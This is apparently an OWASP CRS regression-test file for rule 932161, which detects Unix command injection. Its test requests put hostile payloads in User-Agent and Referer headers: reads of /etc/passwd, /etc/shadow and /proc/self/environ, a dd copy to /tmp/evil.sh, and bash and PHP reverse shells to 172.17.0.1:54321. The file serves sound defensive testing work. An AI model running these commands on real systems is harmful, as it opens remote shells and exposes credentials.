---
meta:
  author: "Franziska Bühler"
  enabled: true
  name: "932161.yaml"
tests:
  - test_title: 932161-1
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: cat /etc/passwd
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: "/"
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-2
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: /etc/shadow
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: "/"
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-3
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: cat /proc/self/environ
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-4
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: '/'
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-5
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: '/'
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-6
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: '/'
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-7
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: OWASP CRS test agent
              Referer: cat /etc/passwd
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: "/"
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-8
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: OWASP CRS test agent
              Referer: /etc/shadow
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: "/"
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-9
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: OWASP CRS test agent
              Referer: cat /proc/self/environ
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-10
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: OWASP CRS test agent
              Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: '/'
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-11
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: OWASP CRS test agent
              Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: '/'
            protocol: "http"
          output:
            log_contains: "id \"932161\""
  - test_title: 932161-12
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            method: "GET"
            port: 80
            headers:
              User-Agent: OWASP CRS test agent
              Referer: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
              Host: "localhost"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            uri: '/'
            protocol: "http"
          output:
            log_contains: "id \"932161\""
